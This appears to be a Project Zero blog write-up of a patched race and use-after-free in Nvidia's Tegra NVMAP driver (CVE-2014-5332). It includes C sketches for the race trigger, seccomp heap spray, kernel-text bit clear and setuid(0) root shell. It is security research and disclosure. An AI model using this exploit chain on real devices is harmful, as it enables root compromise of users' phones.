Posted by Lee Campbell, Graphics Pwning Unit
[This guest post continues Project Zero’s practice of promoting excellence in security research on the Project Zero blog]
Background:
- Chrome for Android implements a very different sandbox model to that of Chrome for Linux. One of the platform features we make use of is enabled with the android:isolatedProcess attribute on the <service> tag in the app manifest. The docs say:
android:isolatedProcess
If set to true, this service will run under a special process that is isolated from the rest of the system and has no permissions of its own. The only communication with it is through the Service API (binding and starting).
- Under the covers this places the specified Android Service into a more restrictive SELinux policy and is what Chrome uses for its renderer processes. All is good so far.
- Back in September I decided to take a look at how ‘isolated’ this isolatedProcess actually is, and specifically look at the kernel attack surface.
- As it turns out, access to the GPU drivers is not blocked, and this blog post is the story of exploiting Nvidia's NVMAP driver on the Nexus 9...
What is the NVMAP driver?
- It provides GPU memory management on Nvidia’s Tegra chipsets, which are used in many Android devices and, more recently, Chromebooks.
- Nvidia was very responsive and released an upstream fix within a matter of days; it has since published a bulletin for CVE-2014-5332.
Some internals:
- The entry point is /dev/nvmap, with rw-rw-rw- permissions making it accessible to all.
- There are a number of IOCTLs used to control this driver, and they’ll be our focus for exploitation. A minimal sketch of talking to the device follows.
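- To make this concrete, here is a minimal userspace sketch that opens the device and creates a handle. The ioctl request encoding and the struct layout below are illustrative assumptions; the real definitions live in the driver’s header and may differ between builds.
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Illustrative layout only; the real definitions are in the driver's
 * header and may differ on a given kernel build. */
struct nvmap_create_handle {
    union {
        uint32_t id;     /* NVMAP_IOC_FROM_ID: global handle id */
        uint32_t fd;     /* NVMAP_IOC_FROM_FD: dma-buf fd to import */
        int32_t handle;  /* out: fd referencing the new handle */
    };
    uint32_t size;       /* in: requested allocation size */
};

#define NVMAP_IOC_MAGIC  'N' /* assumed ioctl magic */
#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)

int main(void)
{
    struct nvmap_create_handle op = { .size = 4096 };
    int dev = open("/dev/nvmap", O_RDWR); /* world rw-rw-rw-, so this works
                                             even from an isolated process */

    if (dev < 0 || ioctl(dev, NVMAP_IOC_CREATE, &op) < 0)
        return 1;
    printf("handle fd = %d\n", op.handle); /* predictably starts at 1024 */
    return 0;
}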
NVMAP_IOC_CREATE:
- This ioctl is used to create handles and returns a file descriptor.
- Handles are allocated globally and stored in struct nvmap_handle.
struct nvmap_handle {
    struct rb_node node;  /* entry on global handle tree */
    atomic_t ref;         /* reference count (i.e., # of duplications) */
    atomic_t pin;         /* pin count */
    u32 flags;            /* caching flags */
    ...
- Local client references are maintained by this struct:
struct nvmap_handle_ref {
    struct nvmap_handle *handle;
    struct rb_node node;
    atomic_t dupes;  /* number of times to free on file close */
    atomic_t pin;    /* number of times to unpin on free */
};
- The following code is used to create this structure and allocate the file descriptor.
int nvmap_ioctl_create(struct file *filp, unsigned int cmd, void __user *arg)
{
    struct nvmap_create_handle op;
    struct nvmap_handle_ref *ref = NULL;
    struct nvmap_client *client = filp->private_data;
    int err = 0;
    int fd = 0;

    if (copy_from_user(&op, arg, sizeof(op)))
        return -EFAULT;

    if (!client)
        return -ENODEV;

    if (cmd == NVMAP_IOC_CREATE) {
        ref = nvmap_create_handle(client, PAGE_ALIGN(op.size));
        if (!IS_ERR(ref))
            ref->handle->orig_size = op.size;
    } else if (cmd == NVMAP_IOC_FROM_ID) {
        ref = nvmap_duplicate_handle(client, unmarshal_id(op.id), 0);
    } else if (cmd == NVMAP_IOC_FROM_FD) {
        ref = nvmap_create_handle_from_fd(client, op.fd);
    } else {
        return -EINVAL;
    }

    if (IS_ERR(ref))
        return PTR_ERR(ref);

    fd = nvmap_create_fd(client, ref->handle);
    if (fd < 0)
        err = fd;

    // POINT A

    op.handle = fd;

    if (copy_to_user(arg, &op, sizeof(op))) { // POINT B
        err = -EFAULT;
        nvmap_free_handle(client, __nvmap_ref_to_id(ref));
    }

    if (err && fd > 0)
        sys_close(fd);
    return err;
}
- On successful completion the handle->ref count is 2: one reference held by our client, and one held by the DMA subsystem that provided the file descriptor in nvmap_create_fd. This call always returns fds starting at 1024, so we can predict them.
- When the fd returned by the ioctl is closed by userspace, the DMA subsystem releases its reference. When the fd to /dev/nvmap is closed, the client releases its reference. Once the reference count reaches zero the handle structure is freed.
The bug:
- If the copy_to_user at point B fails then nvmap_free_handle will destroy the client reference and the handle->ref count will drop to 1.
- sys_close will then be called on the fd, releasing the DMA reference, reducing the handle->ref count to 0 and freeing the handle.
- This is the correct operation and no resources are leaked.
- However, the copy_to_user can be forced to fail by providing a userspace address in read-only memory, so the client reference will always be freed.
- Unfortunately a race condition exists at point A, where a second user thread can dup(1024) and acquire another reference to the DMA subsystem's file. Recall that fds are allocated predictably, starting at 1024. This is an easy race to win!
- The function will then continue to sys_close and return failure. In this case sys_close will not release the DMA reference, as userspace now holds another fd. A sketch of the full trigger follows.
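- Putting the pieces together, the trigger looks roughly like this sketch. The nvmap definitions are the assumed ones from the earlier sketch; the essential ingredients are the read-only argument page (forcing the copy_to_user at point B to fail) and a second thread spinning on dup(1024).
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>

/* Assumed definitions, as in the earlier sketch (not the real header). */
struct nvmap_create_handle { union { uint32_t id; uint32_t fd; int32_t handle; }; uint32_t size; };
#define NVMAP_IOC_CREATE _IOWR('N', 0, struct nvmap_create_handle)

static volatile int racing = 1;
static volatile int stolen_fd = -1;

static void *dup_racer(void *unused)
{
    /* nvmap_create_fd() hands out fds from 1024, so the next handle fd
     * is predictable: spin until we catch it between point A and the
     * sys_close() on the error path. */
    while (racing) {
        int fd = dup(1024);
        if (fd >= 0) {
            stolen_fd = fd; /* we now hold an extra DMA reference */
            racing = 0;
        }
    }
    return NULL;
}

int main(void)
{
    int dev = open("/dev/nvmap", O_RDWR);
    pthread_t t;

    /* Build the argument in a page we then make read-only: the
     * copy_from_user() on entry still works, but the copy_to_user()
     * at point B always fails. */
    struct nvmap_create_handle *op = mmap(NULL, 4096,
                                          PROT_READ | PROT_WRITE,
                                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    op->size = 4096;
    mprotect(op, 4096, PROT_READ);

    pthread_create(&t, NULL, dup_racer, NULL);
    while (racing)
        ioctl(dev, NVMAP_IOC_CREATE, op); /* fails with -EFAULT each time */
    pthread_join(t, NULL);

    /* stolen_fd now holds the only remaining reference on the handle. */
    return 0;
}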
Ok that’s great, what now?
- When operating correctly, two references are held to the handle. Having won the race above, there is now only one.
- This is a nice state for an attacker, as userspace now holds a reference to a handle that it can free asynchronously at any time, e.g., during another ioctl call.
- To trigger the freeing of the handle struct, userspace simply calls close() on the dup’ed fd, as sketched below.
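- A minimal sketch of that free-on-demand primitive: a second thread closes the stolen fd at a moment of the attacker’s choosing (stolen_fd being the descriptor obtained from the dup race above).
#include <pthread.h>
#include <unistd.h>

/* With the extra reference stolen above, the nvmap_handle can be freed
 * from another thread at a time of our choosing, e.g. while the main
 * thread sits inside another nvmap ioctl. */
static void *free_handle_thread(void *arg)
{
    int stolen_fd = *(int *)arg;

    /* ...wait for the right moment inside the racing ioctl... */
    close(stolen_fd); /* drops the last reference: kfree(handle) */
    return NULL;
}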
So now we can free on demand, can we break stuff?
- This is tricky; we need to win more races. ;-)
- The ioctl calls take the fd as a reference to the handle. In this case the dup’ed fd can be used to perform operations on the handle in the kernel.
- Here is an example ioctl:
int nvmap_ioctl_getid(struct file *filp, void __user *arg)
{
    struct nvmap_create_handle op;
    struct nvmap_handle *h = NULL;

    if (copy_from_user(&op, arg, sizeof(op)))
        return -EFAULT;

    h = unmarshal_user_handle(op.handle); // POINT C
    if (!h)
        return -EINVAL;

    h = nvmap_handle_get(h); // POINT D
    if (!h)
        return -EPERM;

    op.id = marshal_id(h);
    nvmap_handle_put(h); // POINT E

    return copy_to_user(arg, &op, sizeof(op)) ? -EFAULT : 0;
}
- Most ioctls follow this pattern:
- unmarshal_user_handle - converts the fd to the address of the handle
- nvmap_handle_get - grabs a reference, incrementing handle->ref
- Do some work
- nvmap_handle_put - drops the reference, decrementing handle->ref
- Although userspace can now asynchronously (in another thread) decrement the handle->ref count and cause a free by calling close, there is only a small window in which to do this.
- At point C the handle must be valid, so close cannot be called before this point (or NULL will be returned).
- At point D another reference is taken on the handle, so calling close will not drop the count to zero and the handle will not be freed until point E.
- So corruption can only occur if userspace frees the handle between points C and D. This race is much trickier to win, as very little happens between these two points.
- It’s made harder by the fact that, to advance the exploit, an attacker not only needs to free the handle but also needs to allocate something controllable in its place. As a result, most of the ioctls do not provide enough time between unmarshal_user_handle and nvmap_handle_get to set up an exploitable condition.
NVMAP_IOC_RESERVE to the rescue:
- There is only one viable ioctl where I could generate enough time to create an exploitable condition. The IOC_RESERVE ioctl can be seen here (lots of checks removed for clarity):
int nvmap_ioctl_cache_maint_list(struct file *filp, void __user *arg,
                                 bool is_reserve_ioctl)
{
    struct nvmap_cache_op_list op;
    u32 *handle_ptr;
    u32 *offset_ptr;
    u32 *size_ptr;
    struct nvmap_handle **refs;
    int i, err = 0;

    if (copy_from_user(&op, arg, sizeof(op)))
        return -EFAULT;

    refs = kcalloc(op.nr, sizeof(*refs), GFP_KERNEL);
    if (!refs)
        return -ENOMEM;

    handle_ptr = (u32 *)(uintptr_t)op.handles;
    offset_ptr = (u32 *)(uintptr_t)op.offsets;
    size_ptr = (u32 *)(uintptr_t)op.sizes;

    for (i = 0; i < op.nr; i++) {
        u32 handle;

        if (copy_from_user(&handle, &handle_ptr[i], sizeof(handle))) {
            err = -EFAULT;
            goto free_mem;
        }
        refs[i] = unmarshal_user_handle(handle); // POINT F
        if (!refs[i]) {
            err = -EINVAL;
            goto free_mem;
        }
    }

    if (is_reserve_ioctl) // POINT G
        err = nvmap_reserve_pages(refs, offset_ptr, size_ptr,
                                  op.nr, op.op);

free_mem:
    kfree(refs);
    return err;
}
- In this ioctl unmarshal_user_handle is called in a loop (point F), which must complete before the handles are used at point G.
- The iteration count, and therefore the time spent in the loop, is user-controlled. It can be made fairly large (around 4k entries) to provide enough time to set up the attack.
- refs[0] is set from the dup’ed fd. The rest of refs[] are set to point to another, fully valid fd (created without the dup race); they can all be the same.
- While the loop spins, refs[0] can be freed by another thread. By point G we have a stale pointer that is about to be used! The argument setup is sketched below.
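- The setup might look like this sketch (struct layout and ioctl number are assumed, as before; the field names follow the kernel code above):
#include <stdint.h>

/* Assumed userspace view of the reserve-list argument. */
struct nvmap_cache_op_list {
    uint64_t handles; /* user pointer to u32 handle fds */
    uint64_t offsets; /* user pointer to u32 offsets */
    uint64_t sizes;   /* user pointer to u32 sizes */
    uint32_t nr;      /* number of entries */
    uint32_t op;      /* cache maintenance operation */
};

#define NR_ENTRIES 4096 /* large enough to widen the window between F and G */

static uint32_t handle_fds[NR_ENTRIES];
static uint32_t offsets[NR_ENTRIES];
static uint32_t sizes[NR_ENTRIES];

static void setup_reserve_args(struct nvmap_cache_op_list *op,
                               int racy_fd, int valid_fd)
{
    int i;

    handle_fds[0] = racy_fd;      /* the handle we can free at will */
    for (i = 1; i < NR_ENTRIES; i++)
        handle_fds[i] = valid_fd; /* padding that burns time at point F */
    for (i = 0; i < NR_ENTRIES; i++) {
        offsets[i] = 0;
        sizes[i] = 4096;          /* one page: start_page 0, end_page 1 */
    }

    op->handles = (uintptr_t)handle_fds;
    op->offsets = (uintptr_t)offsets;
    op->sizes = (uintptr_t)sizes;
    op->nr = NR_ENTRIES;
    op->op = 0; /* anything other than NVMAP_PAGES_RESERVE */
}

/* While NVMAP_IOC_RESERVE spins in the unmarshal loop, a second thread
 * close()s racy_fd and sprays the heap, so refs[0] is stale by point G. */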
- nvmap_reserve_pages is then called and is shown here:
int nvmap_reserve_pages(struct nvmap_handle **handles, u32 *offsets, u32 *sizes,
                        u32 nr, u32 op)
{
    int i;

    for (i = 0; i < nr; i++) {
        u32 size = sizes[i] ? sizes[i] : handles[i]->size;
        u32 offset = sizes[i] ? offsets[i] : 0;

        if (op == NVMAP_PAGES_RESERVE)
            nvmap_handle_mkreserved(handles[i], offset, size);
        else
            nvmap_handle_mkunreserved(handles[i], offset, size);
    }

    if (op == NVMAP_PAGES_RESERVE)
        nvmap_zap_handles(handles, offsets, sizes, nr);
    return 0;
}
- By setting op != NVMAP_PAGES_RESERVE, nvmap_handle_mkunreserved is called on each handle. This is a no-op for all handles except handles[0], which has been freed.
- nvmap_handle_mkunreserved is shown here along with its helper functions:
static inline void nvmap_handle_mkunreserved(struct nvmap_handle *h,
                                             u32 offset, u32 size)
{
    nvmap_handle_mk(h, offset, size, nvmap_page_mkunreserved);
}

static inline void nvmap_page_mkunreserved(struct page **page)
{
    *page = (struct page *)((unsigned long)*page & ~2UL);
}

static inline void nvmap_handle_mk(struct nvmap_handle *h,
                                   u32 offset, u32 size,
                                   void (*fn)(struct page **))
{
    int i;
    int start_page = PAGE_ALIGN(offset) >> PAGE_SHIFT;
    int end_page = (offset + size) >> PAGE_SHIFT;

    if (h->heap_pgalloc) {
        for (i = start_page; i < end_page; i++)
            fn(&h->pgalloc.pages[i]);
    }
}
- This code uses the pointer h->pgalloc.pages stored in the handle struct. It points to an array of page pointers; the array is iterated and the bit of value 2 is cleared in each entry.
- start_page and end_page are user-controlled, so the number of entries touched can be controlled and easily set to one.
- As the handle has been freed, there is a momentary opportunity to allocate attacker-controlled data in its place and so control h->pgalloc.pages.
- This allows an attacker to clear that bit in any word in the system (a payload sketch follows). A lot of work for a single bit clear, but I’ll take it :)
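- For the stale refs[0] to be useful, the data sprayed over the freed handle only has to make h->heap_pgalloc true and aim h->pgalloc.pages at the word to be modified. A sketch of the payload; the field offsets here are placeholders that would have to be recovered from the exact target kernel build:
#include <stdint.h>
#include <string.h>

/* Placeholder offsets into struct nvmap_handle; the real values are
 * build-specific and would be read out of the target kernel. */
#define HEAP_PGALLOC_OFF 0x60 /* assumed offset of h->heap_pgalloc */
#define PAGES_PTR_OFF    0x68 /* assumed offset of h->pgalloc.pages */
#define HANDLE_SIZE      224  /* size of struct nvmap_handle */

/* Build a fake handle so that nvmap_handle_mk() walks a one-entry
 * "pages array" located at target, i.e. *(u64 *)target &= ~2UL. */
static void build_fake_handle(uint8_t payload[HANDLE_SIZE], uint64_t target)
{
    memset(payload, 0, HANDLE_SIZE);
    payload[HEAP_PGALLOC_OFF] = 1;               /* h->heap_pgalloc = true */
    memcpy(payload + PAGES_PTR_OFF, &target, 8); /* h->pgalloc.pages = target */
}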
Heap groom:
- The handle struct is 224 bytes and is allocated with kzalloc. This places it in the kmalloc-256 cache.
- An attacker needs to find something that can be allocated quickly, is around 256 bytes long, and has controllable content.
- Seccomp-bpf provides such a facility in the form of seccomp-bpf programs (or filters). I picked seccomp as I use it a lot, but there are many other things in the kernel you could pick.
- Allocating a filter (sized around 256 bytes) at point G will hopefully reallocate over the freed handle struct.
- The filter is invalid, so it is immediately freed by seccomp-bpf, but its contents remain in memory long enough for the attack to succeed.
- So now we control the pointer to a single bit clear! A sketch of the groom follows.
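- A sketch of the groom, assuming the classic-BPF seccomp behaviour of the day: the kernel copies the filter into a kmalloc’d buffer, rejects it during validation, and immediately kfrees it, leaving our bytes behind in a kmalloc-256 slot. Note the filter bytes land a header’s distance into the allocation, so the fake-handle offsets have to be shifted by sizeof(struct seccomp_filter); the instruction count below is likewise an assumption to be tuned so the whole allocation stays within 256 bytes.
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stdint.h>
#include <string.h>
#include <sys/prctl.h>

#define SPRAY_INSNS 28 /* 28 * 8 = 224 bytes of filter; tune so that
                          header + insns lands in kmalloc-256 */

static void spray_fake_handle(const uint8_t *payload, size_t len)
{
    struct sock_filter insns[SPRAY_INSNS];
    struct sock_fprog prog = { .len = SPRAY_INSNS, .filter = insns };

    /* Fill the "program" with the fake handle bytes. With a zeroed
     * tail it does not end in a BPF_RET, so validation fails and the
     * buffer is kfree'd at once, but its contents survive long enough
     * to be dereferenced as a handle. */
    memset(insns, 0, sizeof(insns));
    memcpy(insns, payload, len < sizeof(insns) ? len : sizeof(insns));

    prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0); /* unprivileged filter attach */
    prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog); /* fails: -EINVAL */
}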
What bit to clear?
- We now need to find a single bit in the kernel that will provide privilege escalation.
- Arm64 does not protect its kernel text sections and they are writable by the kernel itself. As such the kernel can modify its own code. So I looked for a nice instruction to modify.
- Here is a partial disassembly of setuid (Arm64 on the Nexus 9):
ffffffc0000c3bcc:  528000e0  mov  w0, #0x7
ffffffc0000c3bd0:  f9400821  ldr  x1, [x1,#16]
ffffffc0000c3bd4:  f9424034  ldr  x20, [x1,#1152]
ffffffc0000c3bd8:  97ffcd8f  bl   ffffffc0000b7214 <nsown_capable>
ffffffc0000c3bdc:  53001c00  uxtb w0, w0                                 // POINT H
ffffffc0000c3be0:  35000280  cbnz w0, ffffffc0000c3c30 <SyS_setuid+0xa8> // POINT I
ffffffc0000c3be4:  b9400680  ldr  w0, [x20,#4]
ffffffc0000c3be8:  6b0002bf  cmp  w21, w0
- and the C version:
SYSCALL_DEFINE1(setuid, uid_t, uid)
{
    // [.....]
    retval = -EPERM;
    if (nsown_capable(CAP_SETUID)) { // POINT J
        new->suid = new->uid = kuid;
        if (!uid_eq(kuid, old->uid)) {
            retval = set_user(new);
            if (retval < 0)
                goto error;
        }
    } else if (!uid_eq(kuid, old->uid) && !uid_eq(kuid, new->suid)) {
        goto error;
    }
    // [....]
    return commit_creds(new);

error:
    abort_creds(new);
    return retval;
}
- If we can make the condition at point J return non-zero then it will be as if the process has CAP_SETUID, and the attacker can call setuid(0) to elevate to root.
- The asm code at point H is where this condition is evaluated.
- uxtb w0, w0 just zero-extends the byte value in w0 to a full word and stores it back in w0.
- At point I the branch is taken if w0 is non-zero; this is the branch the attacker would like to take to gain privilege.
- The encoding of uxtb w0, w0 is 0x53001c00. Using the bit-clear primitive from above we can change this word to 0x51001c00: the primitive clears the bit of value 2 in a 64-bit word, so aiming it at the instruction’s address plus 3 bytes lines that bit up with bit 25 of the opcode.
- This results in the new instruction sub w0, w0, #7.
- Now w0 will contain the non-zero value -7 and it will appear as if CAP_SETUID is set.
- Now we just call setuid(0) and we are root.
- Easy as that!
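- End to end, the last stage might look like this sketch. attempt_bit_clear() stands in for one run of the free/spray race described above (a hypothetical helper, named here purely for illustration), and UXTB_ADDR is the address of the uxtb at point H, taken from the disassembly of this specific Nexus 9 build.
#include <stdint.h>
#include <unistd.h>

/* Address of 'uxtb w0, w0' at point H in SyS_setuid for this build. */
#define UXTB_ADDR 0xffffffc0000c3bdcUL

/* Hypothetical helper: one attempt at the dup race, free and seccomp
 * spray, with the fake handle's pages pointer set to 'target'. */
extern int attempt_bit_clear(uint64_t target);

int main(void)
{
    /* Bit 25 of the opcode is the bit of value 2 in the byte at offset
     * 3, so the 64-bit '& ~2UL' is aimed at UXTB_ADDR + 3, turning
     * 0x53001c00 (uxtb w0, w0) into 0x51001c00 (sub w0, w0, #7). */
    uint64_t target = UXTB_ADDR + 3;

    /* A lost race is non-fatal, so just keep trying. */
    for (;;) {
        attempt_bit_clear(target);
        if (setuid(0) == 0 && getuid() == 0)
            break;
    }
    execl("/system/bin/sh", "sh", (char *)NULL); /* root shell */
    return 0;
}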
Winning the race:
- There are a number of races in this attack and the probability of success (i.e., them all landing perfectly) is quite low. That said, a loss is non-fatal (for the most part), so an attacker can just keep trying until setuid(0) returns success.
- On a real system this attack takes many thousands of attempts but usually gains root in less than 10 seconds.